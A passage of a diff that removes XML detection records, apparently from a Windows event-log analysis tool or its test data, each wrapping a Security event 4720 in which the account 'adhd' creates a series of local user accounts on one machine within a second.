-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.9310070Z'/&gt;&lt;EventRecordID&gt;4771&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Aaron&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1121&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Aaron&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Aaron</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4765</recordid>
-            <time>2020-06-11 22:05:02.717343400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.7173434Z'/&gt;&lt;EventRecordID&gt;4765&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Alexander&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1120&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Alexander&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Alexander</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4759</recordid>
-            <time>2020-06-11 22:05:02.625358900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.6253589Z'/&gt;&lt;EventRecordID&gt;4759&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Daniel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1119&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Daniel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Daniel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4753</recordid>
-            <time>2020-06-11 22:05:02.542258900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.5422589Z'/&gt;&lt;EventRecordID&gt;4753&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;James&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1118&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;James&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>James</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4747</recordid>
-            <time>2020-06-11 22:05:02.462460600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.4624606Z'/&gt;&lt;EventRecordID&gt;4747&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Thomas&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1117&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Thomas&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Thomas</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4741</recordid>
-            <time>2020-06-11 22:05:02.363556800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.3635568Z'/&gt;&lt;EventRecordID&gt;4741&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;William&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1116&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;William&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>William</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4735</recordid>
-            <time>2020-06-11 22:05:02.260673900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.2606739Z'/&gt;&lt;EventRecordID&gt;4735&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Carol&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1115&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Carol&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Carol</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4729</recordid>
-            <time>2020-06-11 22:05:02.187883800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.1878838Z'/&gt;&lt;EventRecordID&gt;4729&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Charles&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1114&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Charles&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Charles</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4723</recordid>
-            <time>2020-06-11 22:05:02.60882500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:02.0608825Z'/&gt;&lt;EventRecordID&gt;4723&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joseph&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1113&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joseph&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joseph</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4717</recordid>
-            <time>2020-06-11 22:05:01.962210900Z</time>
-            <channel>Security</channel>
